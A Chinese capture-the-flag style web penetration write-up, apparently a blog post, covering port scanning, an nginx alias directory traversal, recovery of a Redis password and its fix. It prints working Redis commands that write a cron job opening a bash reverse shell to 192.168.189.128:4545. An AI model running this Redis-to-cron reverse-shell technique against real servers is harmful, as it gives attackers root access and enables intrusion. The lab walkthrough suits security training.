记一次web渗透做题思路解析

描述:你是一名网络安全服务工程师,现在需要你对A集团网站进行安全防护,找出其中的漏洞点。

1、对目标服务器进行信息搜集,将web站点监听的端口号和版本信息作为flag值提交,提交格式:flag{端口+版本};

由于不知道服务器的IP,扫一下

找的web站点,所以是8081端口发现为nginx服务。

2、对目标服务器进行渗透测试,将触发漏洞的关键手段作为flag值提交,提交格式:flag{*****};

先看看服务器的web有什么东西

发现没有什么,爆破一下目录试试

返回上级,发现目录穿越漏洞,这里的触发漏洞的关键手段就是/images,,.

3、对目标服务器进行渗透测试,发现目标存在数据库服务,将该数据库服务的登录密码作为flag值提交,提交格式:flag{******};

扫描端口时可以看到有一个6379端口,根据信息看的出是redis数据库

这里直接利用目录穿越漏洞得知密码

4、对目标服务器进行渗透测试,将root家目录中的flag文件内容提交,提交格式:flag{******};

设置监听端口

使用密码连接目标redis服务并尝试计划任务提权

bash 复制代码
redis-cli -h target_ip -p server_port -a redis_password
bash 复制代码
config set dir /var/spool/cron
bash 复制代码
config set dbfilename root
bash 复制代码
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.189.128/4545 0>&1\n\n"
bash 复制代码
save

服务器上线

5、对目标服务器进行渗透测试,对目标web服务存在的漏洞点进行修复,将修复时所添加的内容进行md5加密后作为flag值提交,提交格式:flag{******};

通过"images.../"访问时会被替换为别名images/.../导致目录穿越,所以只需要在location指定的别名最后添加一个斜杆即可

加密一下即可

相关推荐
一只鹿鹿鹿8 分钟前
面向智能制造的 RPA 业务自动化整体解决方案(PPT)
大数据·安全·架构·系统安全·制造
杭州默安科技35 分钟前
从海量告警到精准修复:安全智能体如何打通开发安全工具链
网络安全·ai智能体
m0_7156744341 分钟前
2026年中国API安全产品综合排名:选型指南与行业趋势解析
网络·安全·网络安全
学烹饪的小胡桃1 小时前
资产设备管理系统 WGFIX 怎么设置https访问
linux·运维·服务器·网络·安全
猫哥随身wifi1 小时前
AI 手机越智能,随身网络越关键|AI 终端带来的网络新需求
网络·人工智能·智能手机
xixiaoyunya1 小时前
数据库自动备份方案搭建指南:从手动导出到全自动化容灾
安全·电脑
草莓熊Lotso2 小时前
【Redis 进阶】主从复制深度解析:从配置落地到 PSYNC 同步原理
linux·开发语言·网络·数据库·redis·缓存·php
爱学习的程序媛2 小时前
TCP / UDP 协议详解
网络·网络协议·udp·tcp·通信协议
爱学习的程序媛2 小时前
以太网协议详解
网络·网络协议·计算机网络·以太网·ethernet·通信协议
湘美书院--湘美谈教育2 小时前
湘美书院随笔:AI时代的生活经济学
大数据·人工智能·安全·自动化·生活